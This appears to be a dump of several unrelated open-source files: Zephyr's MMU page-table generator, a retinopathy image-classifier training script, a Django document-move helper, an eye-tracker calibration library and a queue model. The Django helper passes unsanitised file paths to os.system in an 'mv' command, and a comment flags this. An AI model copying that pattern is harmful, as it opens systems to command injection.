So simply identity map them to create the page table\n # entries but without the present bit set.\n # Boot and pinned sections (if configured) will be mapped to\n # physical memory below.\n pt.map(image_base, image_base, image_size, map_flags | ENTRY_RW)\n\n if virt_to_phys_offset != 0:\n # Need to identity map the physical address space\n # as it is needed during early boot process.\n # This will be unmapped once z_x86_mmu_init()\n # is called.\n # Note that this only does the identity mapping\n # at the page directory level to minimize wasted space.\n pt.reserve_unaligned(image_base_phys, image_size, to_level=PD_LEVEL)\n pt.identity_map_unaligned(image_base_phys, image_size,\n FLAG_P | FLAG_RW | FLAG_SZ, level=PD_LEVEL)\n\n if isdef(\"CONFIG_X86_64\"):\n # 64-bit has a special region in the first 64K to bootstrap other CPUs\n # from real mode\n locore_base = syms[\"_locore_start\"]\n locore_size = syms[\"_lodata_end\"] - locore_base\n debug(\"Base addresses: physical 0x%x size 0x%x\" % (locore_base,\n locore_size))\n pt.map(locore_base, None, locore_size, map_flags | FLAG_P | ENTRY_RW)\n\n if isdef(\"CONFIG_XIP\"):\n # Additionally identity-map all ROM as read-only\n pt.map(syms[\"CONFIG_FLASH_BASE_ADDRESS\"], None,\n syms[\"CONFIG_FLASH_SIZE\"] * 1024, map_flags | FLAG_P)\n\n if isdef(\"CONFIG_LINKER_USE_BOOT_SECTION\"):\n pt.map_region(\"lnkr_boot\", map_flags | FLAG_P | ENTRY_RW, virt_to_phys_offset)\n\n if isdef(\"CONFIG_LINKER_USE_PINNED_SECTION\"):\n pt.map_region(\"lnkr_pinned\", map_flags | FLAG_P | ENTRY_RW, virt_to_phys_offset)\n\n # Process extra mapping requests\n if args.map:\n map_extra_regions(pt)\n\n # Adjust mapped region permissions if configured\n if is_perm_regions:\n # Need to accomplish the following things:\n # - Text regions need the XD flag cleared and RW flag removed\n # if not built with gdbstub support\n # - Rodata regions need the RW flag cleared\n # - User mode needs access as we currently do not separate application\n # text/rodata from kernel text/rodata\n if isdef(\"CONFIG_GDBSTUB\"):\n flags = ENTRY_US | ENTRY_RW\n else:\n flags = ENTRY_US\n\n if is_generic_section_present:\n flags = flags | FLAG_P\n\n pt.set_region_perms(\"__text_region\", flags)\n\n if isdef(\"CONFIG_LINKER_USE_BOOT_SECTION\"):\n pt.set_region_perms(\"lnkr_boot_text\", flags | FLAG_P)\n\n if isdef(\"CONFIG_LINKER_USE_PINNED_SECTION\"):\n pt.set_region_perms(\"lnkr_pinned_text\", flags | FLAG_P)\n\n flags = ENTRY_US | ENTRY_XD\n if is_generic_section_present:\n flags = flags | FLAG_P\n\n pt.set_region_perms(\"__rodata_region\", flags)\n\n if isdef(\"CONFIG_LINKER_USE_BOOT_SECTION\"):\n pt.set_region_perms(\"lnkr_boot_rodata\", flags | FLAG_P)\n\n if isdef(\"CONFIG_LINKER_USE_PINNED_SECTION\"):\n pt.set_region_perms(\"lnkr_pinned_rodata\", flags | FLAG_P)\n\n if isdef(\"CONFIG_COVERAGE_GCOV\") and isdef(\"CONFIG_USERSPACE\"):\n # If GCOV is enabled, user mode must be able to write to its\n # common data area\n pt.set_region_perms(\"__gcov_bss\",\n FLAG_P | ENTRY_RW | ENTRY_US | ENTRY_XD)\n\n if isdef(\"CONFIG_X86_64\"):\n # Set appropriate permissions for locore areas much like we did\n # with the main text/rodata regions\n\n if isdef(\"CONFIG_X86_KPTI\"):\n # Set the User bit for the read-only locore/lorodata areas.\n # This ensures they get mapped into the User page tables if\n # KPTI is turned on. 
There is no sensitive data in them, and\n # they contain text/data needed to take an exception or\n # interrupt.\n flag_user = ENTRY_US\n else:\n flag_user = 0\n\n pt.set_region_perms(\"_locore\", FLAG_P | flag_user)\n pt.set_region_perms(\"_lorodata\", FLAG_P | ENTRY_XD | flag_user)\n\n written_size = pt.write_output(args.output)\n debug(\"Written %d bytes to %s\" % (written_size, args.output))\n\n # Warn if reserved page table is not of correct size\n if reserved_pt_size and written_size != reserved_pt_size:\n # Figure out how many extra pages needed\n size_diff = written_size - reserved_pt_size\n page_size = syms[\"CONFIG_MMU_PAGE_SIZE\"]\n extra_pages_needed = int(round_up(size_diff, page_size) / page_size)\n\n if isdef(\"CONFIG_X86_EXTRA_PAGE_TABLE_PAGES\"):\n extra_pages_kconfig = syms[\"CONFIG_X86_EXTRA_PAGE_TABLE_PAGES\"]\n if isdef(\"CONFIG_X86_64\"):\n extra_pages_needed += ctypes.c_int64(extra_pages_kconfig).value\n else:\n extra_pages_needed += ctypes.c_int32(extra_pages_kconfig).value\n\n reason = \"big\" if reserved_pt_size > written_size else \"small\"\n\n error((\"Reserved space for page table is too %s.\"\n \" Set CONFIG_X86_EXTRA_PAGE_TABLE_PAGES=%d\") %\n (reason, extra_pages_needed))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zephyrproject-rtos/zephyr","sub_path":"arch/x86/gen_mmu.py","file_name":"gen_mmu.py","file_ext":"py","file_size_in_byte":29828,"program_lang":"python","lang":"en","doc_type":"code","stars":8707,"dataset":"github-code","pt":"66"} +{"seq_id":"15074546414","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nfrom PIL import Image\r\n#import cv2\r\nimport shutil\r\nimport time\r\nfrom sklearn.utils import shuffle\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\nfrom sklearn.metrics import classification_report, confusion_matrix\r\n\r\n####################### Parameters #######################\r\nClass_Amounts = 2\r\nMax_Data_Amount = 223 # For Each Class\r\nAugmenting = 1 # 1: Active, 0: Disable\r\nRounds = 20 # Iterations Of Iterative Training\r\nEpoch_Per_Round = 5\r\nTraining_Batch = 69\r\n####################### Loading Data #######################\r\n# Extracting Files Address\r\n# Train Data\r\n#from sklearn.utils import shuffle\r\n#from sklearn.model_selection import train_test_split\r\n\r\nRoot_Address = [\"/Dataset/Train/\"]\r\n\r\n\r\nX_Address = []\r\nY = []\r\nClasses_Count = []\r\n\r\nfor j in range(len(Root_Address)):\r\n Base_Address = os.getcwd() + Root_Address[j]\r\n\r\n Classes = os.listdir(Base_Address)\r\n Classes.sort()\r\n print(Classes)\r\n print(\"----------------------- -----------------------\")\r\n\r\n Temp_Address = []\r\n for i in range(len(Classes)):\r\n Classes_Count += [0]\r\n Class_Address = Base_Address + \"/\" + str(Classes[i])\r\n Temp_Address += [Class_Address + \"/\" + j + \"/\" for j in os.listdir(Class_Address)]\r\n Temp_Address.sort()\r\n print(Class_Address)\r\n \r\n while len(Temp_Address) != 0:\r\n Temp = os.listdir(Temp_Address[0])\r\n if np.any([\".jpg\" in name.lower() for name in Temp]):\r\n Temp = [Temp_Address[0] + j for j in Temp if \".jpg\" in j.lower()]\r\n Temp.sort()\r\n Temp = Temp[2:]\r\n X_Address += Temp\r\n Y += [Classes[i] for j in range(len(Temp))]\r\n \"\"\"\r\n if \"/SELECTED 4010928\" in Root_Address[j] or \"/selected 4011005/\" in Root_Address[j]: # Duplicate Low Quality Data\r\n X_Address += Temp\r\n Y += [Classes[i] for j 
in range(len(Temp))]\r\n \"\"\"\r\n Classes_Count[-1] += len(Temp)\r\n else:\r\n Temp_Address += [Temp_Address[0] + j + \"/\" for j in Temp]\r\n Temp_Address.pop(0)\r\n #\r\n print(\"%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%\")\r\n\r\n\r\n#from sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\n\r\nEncoding = LabelEncoder().fit(Y)\r\nY = Encoding.transform(Y)\r\n#Y = Encoding.inverse_transform(Y)\r\nprint(Encoding.classes_)\r\n\r\nif len(Y.shape) == 1:\r\n Y = np.expand_dims(Y, axis = 1)\r\n\r\nOneHot = OneHotEncoder().fit(Y)\r\nY = OneHot.transform(Y).toarray()\r\n\r\n#X_Address, Y = shuffle(X_Address, Y)\r\nprint()\r\n\r\n\r\n# Test Data\r\nRoot_Address = [\"/Dataset/Train/\"]\r\n#Base_Address = os.getcwd() + \"/selected 4011030\"\r\n# NOTE: build an absolute path as the training loader does; this still reads\r\n# from Dataset/Train, so point it at a held-out folder for a genuine test set\r\nBase_Address = os.getcwd() + Root_Address[0]\r\n\r\nClasses = os.listdir(Base_Address)\r\nClasses.sort()\r\nprint(Classes)\r\nprint(\"----------------------- ----------------------- -----------------------\")\r\n\r\nX_Test_Address = []\r\nY_Test = []\r\nClasses_Count = []\r\n\r\nTemp_Address = []\r\nfor i in range(len(Classes)):\r\n Classes_Count += [0]\r\n Class_Address = Base_Address + \"/\" + str(Classes[i])\r\n Temp_Address += [Class_Address + \"/\" + j + \"/\" for j in os.listdir(Class_Address)]\r\n Temp_Address.sort()\r\n print(Class_Address)\r\n \r\n while len(Temp_Address) != 0:\r\n Temp = os.listdir(Temp_Address[0])\r\n if np.any([\".jpg\" in name.lower() for name in Temp]):\r\n Temp = [Temp_Address[0] + j for j in Temp if \".jpg\" in j.lower()]\r\n Temp.sort()\r\n Temp = Temp[2:]\r\n X_Test_Address += Temp\r\n Y_Test += [Classes[i] for j in range(len(Temp))]\r\n Classes_Count[-1] += len(Temp)\r\n else:\r\n Temp_Address += [Temp_Address[0] + j + \"/\" for j in Temp]\r\n Temp_Address.pop(0)\r\n #\r\n \r\n# Loading Test Data From Extracted Files Address\r\n\r\nX_Test = []\r\n\r\nResize_Shape = (256, 256)\r\n\r\nfor i in range(len(X_Test_Address)):\r\n X_Test += [np.array(Image.open(X_Test_Address[i]).resize(Resize_Shape, Image.ANTIALIAS))]\r\n\r\n#X = np.array(X, dtype = np.float32) / 255.0\r\nX_Test = np.array(X_Test, dtype = np.float16) / 255.0\r\nY_Test = Encoding.transform(Y_Test)\r\n\r\nif len(Y_Test.shape) == 1:\r\n Y_Test = np.expand_dims(Y_Test, 1)\r\nY_Test = OneHot.transform(Y_Test).toarray()\r\nprint()\r\n\r\nif \"Class_Amounts\" not in globals() or \"Class_Amounts\" not in locals():\r\n Class_Amounts = len(Classes)\r\n\r\n####################### Model #######################\r\nModel_Name = \"Model_20230827\"\r\n\r\n#Input_Shape = (256, 256, 3)\r\n#L_0 = tf.keras.layers.Input(shape = Input_Shape)\r\nL_0 = tf.keras.layers.Input(shape = X_Test.shape[1:])\r\n\r\nL_1 = tf.keras.layers.Conv2D(16, (3, 3), activation = \"relu\", padding = \"same\")(L_0)\r\nL_1 = tf.keras.layers.BatchNormalization()(L_1)\r\nL_1 = tf.keras.layers.Conv2D(16, (3, 3), strides = (2, 2), activation = \"relu\", padding = \"same\")(L_1)\r\n\r\nL_2 = tf.keras.layers.Conv2D(16, (3, 3), activation = \"relu\", padding = \"same\")(L_1)\r\nL_2 = tf.keras.layers.BatchNormalization()(L_2)\r\nL_2 = tf.keras.layers.Conv2D(16, (3, 3), strides = (2, 2), activation = \"relu\", padding = \"same\")(L_2)\r\n\r\nL_3 = tf.keras.layers.Conv2D(16, (3, 3), activation = \"relu\", padding = \"same\")(L_2)\r\nL_3 = tf.keras.layers.BatchNormalization()(L_3)\r\nL_3 = tf.keras.layers.Conv2D(24, (3, 3), strides = (2, 2), activation = \"relu\", padding = \"same\")(L_3)\r\n\r\n
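# Architecture note: each stage repeats the same pattern (3x3 conv -> batch\r\n# norm -> strided 3x3 conv), halving the spatial size; the seven stride-2\r\n# stages reduce the 256x256 input to a 2x2x32 map before the Flatten/Dense\r\n# softmax head.\r\n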
L_4 = tf.keras.layers.Conv2D(24, (3, 3), activation = \"relu\", padding = \"same\")(L_3)\r\nL_4 = tf.keras.layers.BatchNormalization()(L_4)\r\nL_4 = tf.keras.layers.Conv2D(24, (3, 3), strides = (2, 2), activation = \"relu\", padding = \"same\")(L_4)\r\n\r\nL_5 = tf.keras.layers.Conv2D(24, (3, 3), activation = \"relu\", padding = \"same\")(L_4)\r\nL_5 = tf.keras.layers.BatchNormalization()(L_5)\r\nL_5 = tf.keras.layers.Conv2D(24, (3, 3), strides = (2, 2), activation = \"relu\", padding = \"same\")(L_5)\r\n\r\nL_6 = tf.keras.layers.Conv2D(24, (3, 3), activation = \"relu\", padding = \"same\")(L_5)\r\nL_6 = tf.keras.layers.BatchNormalization()(L_6)\r\nL_6 = tf.keras.layers.Conv2D(32, (3, 3), strides = (2, 2), activation = \"relu\", padding = \"same\")(L_6)\r\n\r\nL_7 = tf.keras.layers.Conv2D(32, (3, 3), activation = \"relu\", padding = \"same\")(L_6)\r\nL_7 = tf.keras.layers.BatchNormalization()(L_7)\r\nL_7 = tf.keras.layers.Conv2D(32, (3, 3), strides = (2, 2), activation = \"relu\", padding = \"same\")(L_7)\r\n\r\nL_Out = L_7\r\n\r\nL_Out = tf.keras.layers.Flatten()(L_Out)\r\nL_Out = tf.keras.layers.Dense(Class_Amounts, activation = \"softmax\")(L_Out)\r\n\r\n\r\nModel = tf.keras.Model(inputs = L_0, outputs = L_Out)\r\n\r\nprint(\"Model Parameters:\", Model.count_params(), \"\\tLayers:\", len(Model.layers))\r\n\r\ntf.keras.utils.plot_model(Model, show_shapes = True\r\n , show_dtype = True, show_layer_names = True\r\n , show_layer_activations = True, to_file = os.getcwd() + \"/Model_Structure.png\")\r\n\r\n\r\n# NOTE: with one-hot labels and a softmax output, CategoricalCrossentropy is\r\n# the usual choice; BinaryCrossentropy still trains this two-class model.\r\nModel.compile(loss = tf.keras.losses.BinaryCrossentropy(), optimizer = \"Adam\", metrics = [\"Acc\", \"MSLE\"]) # , \"MSE\", \"MAE\"\r\n\r\n\r\n####################### Training #######################\r\n\r\n#from sklearn.utils import shuffle\r\n#from sklearn.model_selection import train_test_split\r\n\r\nTemp = []\r\nfor i in range(len(Classes)):\r\n Temp += [len([j for j in range(len(X_Address)) if np.argmax(Y[j]) == i])]\r\n\r\n#Data_Amount = np.min([int(0.71 * np.min(Temp)), 223])\r\nData_Amount = np.min([int(0.71 * np.min(Temp)), Max_Data_Amount])\r\n\r\nResize_Shape = (256, 256)\r\nHistory = pd.DataFrame([])\r\n\r\nif os.path.isdir(os.getcwd() + \"/Model/\" + Model_Name + \"/\") and os.path.isfile(os.getcwd() + \"/Model/\" + Model_Name + \"/saved_model.pb\"):\r\n print(\"Model Exist => Loading...\")\r\n Model = tf.keras.models.load_model(os.getcwd() + \"/Model/\" + Model_Name + \"/\")\r\n History = pd.read_csv(os.getcwd() + \"/Model/\" + Model_Name + \"/History.csv\")\r\n History = History.drop(columns = History.keys()[0])\r\n print(\"Model Was Loaded!!\")\r\n\r\n\r\n# name the round counter distinctly; the class/image loops inside reuse \"i\"\r\nfor rnd in range(Rounds):\r\n print(\"Round\", rnd+1, \"/\", Rounds)\r\n \r\n # Balanced Data\r\n X_Address, Y = shuffle(X_Address, Y) # , random_state = 23\r\n X_Train = []\r\n Y_Train = []\r\n for i in range(len(Classes)):\r\n Temp = [j for j in range(len(X_Address)) if np.argmax(Y[j]) == i][:Data_Amount]\r\n X_Train += np.array(X_Address)[Temp].tolist()\r\n Y_Train += Y[Temp].tolist()\r\n Y_Train = np.array(Y_Train)\r\n #\r\n print(\"Loading Data...\")\r\n X = []\r\n for i in range(len(X_Train)):\r\n X += [np.array(Image.open(X_Train[i]).resize(Resize_Shape, Image.ANTIALIAS))]\r\n\r\n X = np.array(X, dtype = np.float16) / 255.0\r\n print(\"Data Is Just Loaded!!\")\r\n #\r\n # Augmentation\r\n if Augmenting == 1:\r\n print(\"Augmentation\")\r\n 
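# Augmentation note: the seven geometric variants (flips/rotations) plus\r\n # one contrast-adjusted copy give 9x the sampled images per round\r\n # (originals included); Y_Aug tiles the labels to match below.\r\n X_2 = np.flip(X, axis = 1) # UpDown\r\n X_3 = np.flip(X, axis = 2) # Left To Right\r\n X_4 = np.rot90(X, k = 1, axes = (1, 2)) # k = 1: 1 Time That Means 90 Degrees,\r\n X_5 = np.rot90(X, k = 3, axes = (1, 2)) # k = 3: 3 Time That Means 270 Degrees,\r\n X_6 = np.flip(X_3, 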
axis = 1) # UpDown\r\n X_7 = np.flip(X_4, axis = 2) # Left To Right\r\n X_8 = np.flip(X_5, axis = 1) # UpDown\r\n X_9 = tf.image.adjust_contrast(X, 2.3).numpy() # Increase Contrast By Factor 2.3\r\n\r\n X_Aug = np.concatenate((X, X_2, X_3, X_4, X_5, X_6, X_7, X_8, X_9))\r\n Y_Aug = np.concatenate(tuple([Y_Train for i in range(int(X_Aug.shape[0] / X.shape[0]))])) # np.transpose(np.tile(np.transpose(Y), 8))\r\n del X_2, X_3, X_4, X_5, X_6, X_7, X_8, X_9\r\n X = X_Aug\r\n Y_Train = Y_Aug\r\n del X_Aug, Y_Aug\r\n #\r\n X_Train = np.copy(X)\r\n del X\r\n #\r\n Model.fit(X_Train, Y_Train, batch_size = Training_Batch, epochs = Epoch_Per_Round, validation_data = (X_Test, Y_Test))\r\n #\r\n # History\r\n if len(Model.history.history[\"loss\"]) != 0:\r\n Temp_History = Model.history.history\r\n if len(History) != 0:\r\n History = pd.concat([History, pd.DataFrame(Temp_History, columns = Temp_History.keys())], ignore_index = True)\r\n else:\r\n History = pd.DataFrame(Temp_History, columns = Temp_History.keys())\r\n #\r\n\r\n Model.save(os.getcwd() + \"/Model/\" + Model_Name + \"/\")\r\n History.to_csv(os.getcwd() + \"/Model/\" + Model_Name + \"/History.csv\")\r\n #\r\n Model = tf.keras.models.load_model(os.getcwd() + \"/Model/\" + Model_Name + \"/\")\r\n #\r\n print(\"----------------------- ----------------------- ----------------------- -----------------------\")\r\n\r\n\r\n####################### Classification Report #######################\r\n\r\n#from sklearn.metrics import classification_report, confusion_matrix\r\nprint(\"Model Evaluation:\", Model.evaluate(X_Test, Y_Test))\r\nprint(\"::::::::::::::::::::::: ::::::::::::::::::::::: ::::::::::::::::::::::: :::::::::::::::::::::::\")\r\n# confusion_matrix expects class indices, not one-hot rows or probabilities\r\nprint(confusion_matrix(np.argmax(Y_Test, axis = 1), np.argmax(Model.predict(X_Test), axis = 1)))\r\nprint(\"::::::::::::::::::::::: ::::::::::::::::::::::: ::::::::::::::::::::::: :::::::::::::::::::::::\")\r\nprint(classification_report(np.argmax(Y_Test, axis = 1), np.argmax(Model.predict(X_Test), axis = 1) ))\r\n\r\n\"\"\"####################### Loading Data #######################\"\"\"\r\n\r\nprint(\"Training Is Finished, Hope The Results Were Good Enough.\")\r\n","repo_name":"DRAGON20-3/Retinopathy_of_Prematurity","sub_path":"ROP_Detection/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":10840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9430146305","text":"from documents.models import Document\nfrom categories.models import Category\nimport os\n\n\ndef move_doc(doc_id, cat_id):\n doc = Document.objects.get(pk=int(doc_id))\n old_cat = doc.refer_category\n new_cat = Category.objects.get(pk=int(cat_id))\n for p in doc.pages.all():\n # NOTE: a path containing spaces or shell metacharacters breaks this\n # command; shutil.move would be a safer alternative\n cmd = \"mv \" + p.get_absolute_path() + \" \" + new_cat.get_absolute_path() + \"/\"\n os.system(cmd)\n doc.refer_category = new_cat\n doc.save()\n old_cat.documents.remove(doc)\n new_cat.documents.add(doc)\n\n\n","repo_name":"Foxugly/MyTaxAccountant","sub_path":"scripts/move_document.py","file_name":"move_document.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"41250675553","text":"# -----------------------------------------------------------------------\n#\n# nir library v0.1.3\n# ------------------\n# (Newman, Ian R = nir)\n# https://github.com/irnewman/nir\n#\n# This is a library of tools for the Cognitive Science Lab at the \n# University of Saskatchewan. 
Please note that this is a work in progress\n# and is written by an amateur; use at your own risk!\n#\n# All correspondence should be directed to:\n#\n# Ian R. Newman\n# ian.newman@usask.ca\n#\n# -----------------------------------------------------------------------\n\n\n# ---------------------------------------------\n# ---- Import Libraries\n# ---------------------------------------------\n\nfrom psychopy import visual, core, event # sound, gui, data, logging\nimport os\n# import sys\n# import csv\n# from itertools import product\n\n# eye-tracking libraries\nfrom iViewXAPI import * # iViewX library\nfrom iViewXAPIReturnCodes import *\n\n# ---------------------------------------------\n\n\n# ---------------------------------------------\n# ---- RunCalibration (not totally finished: change calibration arguments and file logging)\n# ---------------------------------------------\n\ndef run_calibration(participant=0, max_tries=10, deviation=1):\n\n \"\"\"\n Function: connect to SMI eye-tracker, calibrate, validate, and create log file\n Arguments:\n participant = current participant number\n max_tries = maximum calibration attempts\n deviation = acceptable horizontal and vertical deviation from the target\n \"\"\"\n\n # variables\n calibrated = False\n attempts = 1\n max_attempts = max_tries\n calibration_deviation = deviation\n\n # set up the log file\n calibration_dir = os.getcwd()\n calibration_filename = calibration_dir + os.sep + \"data\" + os.sep + str(participant) + \"_calibration\" + \".txt\"\n calibration_log = open(calibration_filename, 'w')\n res = iViewXAPI.iV_SetLogger(c_int(1), c_char_p(str(participant) + \"_log.txt\"))\n\n # connect to iViewX\n res = iViewXAPI.iV_Connect(c_char_p('127.0.0.1'), c_int(4444), c_char_p('127.0.0.1'), c_int(5555))\n if res != 1:\n HandleError(res)\n exit(0)\n\n # log system info\n res = iViewXAPI.iV_GetSystemInfo(byref(systemData))\n calibration_log.write(\"iV_GetSystemInfo: \" + str(res) + \"\\n\")\n calibration_log.write(\"Samplerate: \" + str(systemData.samplerate) + \"\\n\")\n calibration_log.write(\n \"iViewX Version: \" + str(systemData.iV_MajorVersion) + \".\" + str(systemData.iV_MinorVersion) + \".\" + str(\n systemData.iV_Buildnumber) + \"\\n\")\n calibration_log.write(\n \"iViewX API Version: \" + str(systemData.API_MajorVersion) + \".\" + str(systemData.API_MinorVersion) + \".\" + str(\n systemData.API_Buildnumber) + \"\\n\")\n\n # create calibration parameters\n \"\"\"\n Arguments:\n 1. method\n 2. visualization\n 3. display device\n 4. speed\n 5. autoaccept\n 6. foreground brightness\n 7. background brightness\n 8. target shape\n 9. target size\n 10. 
target filename\n \"\"\"\n calibrationData = CCalibration(5, 1, 0, 0, 1, 250, 0, 2, 20, b\"\")\n res = iViewXAPI.iV_SetupCalibration(byref(calibrationData))\n calibration_log.write(\"Setup Calibration: \" + str(res) + \"\\n\")\n\n # calibrate eye-tracker within accepted deviation\n while not calibrated and attempts < max_attempts:\n\n cali = iViewXAPI.iV_Calibrate()\n vali = iViewXAPI.iV_Validate()\n acc = iViewXAPI.iV_GetAccuracy(byref(accuracyData), 1)\n\n LX = accuracyData.deviationLX\n LY = accuracyData.deviationLY\n RX = accuracyData.deviationRX\n RY = accuracyData.deviationRY\n\n if all([\n LX < calibration_deviation,\n LY < calibration_deviation,\n RX < calibration_deviation,\n RY < calibration_deviation,\n LX > 0.0,\n LY > 0.0,\n RX > 0.0,\n RY > 0.0\n ]):\n calibrated = True\n\n # create window to print results\n calibration_win = visual.Window(\n size=(1920, 1200), fullscr=True, screen=0,\n allowGUI=False, allowStencil=False,\n monitor='testMonitor', color=u'black', colorSpace='rgb',\n blendMode='avg', useFBO=True)\n\n calibration_text = (\"Deviation left x: \" + str(LX) + \"\\n\"\n \"Deviation left y: \" + str(LY) + \"\\n\"\n \"Deviation right x: \" + str(RX) + \"\\n\"\n \"Deviation right y: \" + str(RY) + \"\\n\\n\\n\"\n \"Calibration Success: \" + str(calibrated)\n )\n\n calibration_rerun_text = (\"Calibration will begin again shortly.\\n\\n\"\n \"Please remain as still as possible. Do your best to focus directly on the dot.\\n\\n\\n\"\n \"Attempts remaining: \" + str(max_attempts - attempts)\n )\n\n calibration_results = visual.TextStim(win=calibration_win,\n text=calibration_text,\n pos=(0, 0.25),\n height=0.075,\n color=u'white', colorSpace='rgb',\n wrapWidth=1.5)\n\n calibration_rerun = visual.TextStim(win=calibration_win,\n text=calibration_rerun_text,\n pos=(0, 0.25),\n height=0.075,\n color=u'white', colorSpace='rgb',\n wrapWidth=1.5)\n\n # display results to screen\n calibration_results.draw()\n calibration_win.flip()\n core.wait(5)\n\n if not calibrated:\n calibration_rerun.draw()\n calibration_win.flip()\n core.wait(5)\n\n calibration_win.close()\n attempts += 1\n\n # write to log file\n if calibrated:\n calibration_log.write(\"Calibration Success: \" + str(cali) + \"\\n\")\n calibration_log.write(\"Validation Success: \" + str(vali) + \"\\n\")\n calibration_log.write(\"Accuracy: \" + str(acc) + \"\\n\")\n calibration_log.write(\"deviationXLeft: \" + str(accuracyData.deviationLX) + \"\\n\")\n calibration_log.write(\"deviationYLeft: \" + str(accuracyData.deviationLY) + \"\\n\")\n calibration_log.write(\"deviationXRight: \" + str(accuracyData.deviationRX) + \"\\n\")\n calibration_log.write(\"deviationYRight: \" + str(accuracyData.deviationRY) + \"\\n\")\n res = iViewXAPI.iV_ShowTrackingMonitor()\n calibration_log.write(\"Tracking Monitor: \" + str(res) + \"\\n\")\n calibration_log.close()\n\n\n# ---------------------------------------------\n\n\ndef timecourse_eyetracking(xPos_left, yPos_left, xPos_right, yPos_right,\n pDiam_left, pDiam_right, t_sample, t_num, sample_rate, key_list):\n\n eyetrack_timecourse = True\n counter = 1\n event.clearEvents(eventType='keyboard') # clear keyboard buffer\n \n # init timer\n timer = core.Clock() \n timer.reset()\n t0 = start = timer.getTime()\n t1 = t0 + sample_rate\n rt = 0\n key_press = event.BuilderKeyResponse()\n\n while eyetrack_timecourse:\n \n # get timestamp for current loop iteration\n timestamp = timer.getTime()\n \n # check for response\n key_press = event.getKeys(keyList=key_list)\n \n # if response given, end loop\n if 
len(key_press) > 0:\n rt = timer.getTime()\n eyetrack_timecourse = False\n \n # gather eye-tracking data here\n if timestamp > t1:\n iViewXAPI.iV_GetSample(byref(sampleData))\n t1 += sample_rate # increment t1 by the sample rate\n t = timestamp - start\n xPos_left.append(sampleData.leftEye.gazeX)\n xPos_right.append(sampleData.rightEye.gazeX)\n yPos_left.append(sampleData.leftEye.gazeY)\n yPos_right.append(sampleData.rightEye.gazeY)\n pDiam_left.append(sampleData.leftEye.diam)\n pDiam_right.append(sampleData.rightEye.diam)\n t_sample.append(t)\n t_num.append(counter)\n counter += 1\n \n return key_press, rt\n\n\n\n# unused:\n # left_eye = CEye(0,0,0)\n # right_eye = CEye(0,0,0)\n # eye_sample = CSample(0,left_eye,right_eye,0)\n # position_x_left = eye_sample.leftEye.gazeX\n # print \"position x left: \" + str(position_x_left)\n # iViewXAPI.iV_GetSample(byref(sampleData))\n # position_x_left = sampleData.leftEye.gazeX\n # print \"position x left: \" + str(position_x_left)\n\n # key_pressed = psychopy.event.waitKeys(keyList=[\"left\", \"right\"])\n # change to getkeys loop, possibly all within a function call\n # it would take the lists and the sample rate as arguments (so 9 arguments already, plus maybe the sample data)\n\n # xPos_left.append(sampleData.leftEye.gazeX)\n # xPos_right.append(sampleData.rightEye.gazeX)\n # yPos_left.append(sampleData.leftEye.gazeY)\n # yPos_right.append(sampleData.rightEye.gazeY)\n # pDiam_left.append(sampleData.leftEye.diam)\n # pDiam_right.append(sampleData.rightEye.diam)\n # t_sample.append(t0)\n # t_num.append(counter)\n\n\"\"\"\n while len(key_pressed) < 1: # add counter with t_number (0 to N)\n\n # sample \n #eye_sample = iV_GetSample()\n\n # diam = pupil diamter, gazeX/Y = position on screen\n position_x_left = eye_sample.leftEye.gazeX\n print \"position x left: \" + position_x_left\n\n position_y_left = eye_sample.leftEye.gazeY\n position_x_right = eye_sample.rightEye.gazeX\n position_y_right = eye_sample.rightEye.gazeY\n diameter_pupil_left = eye_sample.leftEye.diam\n diameter_pupil_right = eye_sample.rightEye.diam\n\n timestamp = trialClock.getTime() # iV_GetCurrentTimestamp()\n t_num = counter\n\n #if timestamp > t1: # not sure if this if statement is strictly necessary yet (may be redundant code here)\n t1 += sample_rate\n t = timestamp - start\n x_left = position_x_left\n x_right = position_x_right\n y_left = position_y_left\n y_right = position_y_right\n pd_left = diameter_pupil_left\n pd_right = diameter_pupil_right\n\n xList_left.append(x_left)\n xList_right.append(x_right)\n yList_left.append(y_left)\n yList_right.append(y_right)\n pList_left.append(pd_left)\n pList_right.append(pd_right)\n tList.append(t)\n tList_num.append(t_num)\n # THEN: save these arrays to the trial handler\n\n counter += 1\n\"\"\"","repo_name":"irnewman/nir","sub_path":"eye.py","file_name":"eye.py","file_ext":"py","file_size_in_byte":10749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43119542359","text":"from __future__ import annotations\nfrom typing import List, Optional, Dict\nfrom enum import Enum\nfrom datetime import timedelta\nfrom ..utils.time import TimeUtil\n\nfrom ...setup import db\n\nfrom .user import User\nfrom .course import Course\nfrom .ticket import Ticket, TicketTag, HelpType\nfrom .ticket import Status as t_status\nfrom .ticket_feedback import TicketFeedback\nfrom .events.ticket_event import TicketEvent, EventType\nfrom .events.queue_login_event import QueueLoginEvent, ActionType, 
EType\n\nfrom .news_feed_post import NewsFeedPost\nfrom .enrolled_course import EnrolledCourse\nfrom .enrolled_course import Status as EStatus\nfrom .enrolled_course import Role as ERole\n\n\n\"\"\"\nDefine Constant\n\"\"\"\nDEFAULT_WAIT_TIME = '0:12:00' # 12min\nMIN_WAIT_TIME = '0:05:00' # 5min\n\n\nclass Status(Enum):\n \"\"\"\n The status of the queue with the following options --> database value:\\n\n OPEN --> 0\\n\n LOCKED --> 1\\n\n CLOSED --> 2\\n\n @author YixuanZhou\n \"\"\"\n OPEN = 0\n LOCKED = 1\n CLOSED = 2\n\n\nclass Queue(db.Model):\n \"\"\"\n The main queue handler for the queue page.\\n\n Fields: \\n\n id --> The id of the queue, unique primary key.\\n\n status --> The status of the queue, not nullable.\\n\n highCapacityEnabled --> Boolean if the high capacity is on, not nullable.\\n\n highCapacityThreshold --> The threshold to identify if the queue is\\\n at high capacity, not nullable.\\n\n highCapacityMessage --> The message to show when at high capacity for tutors.\\n\n highCapacityWarning 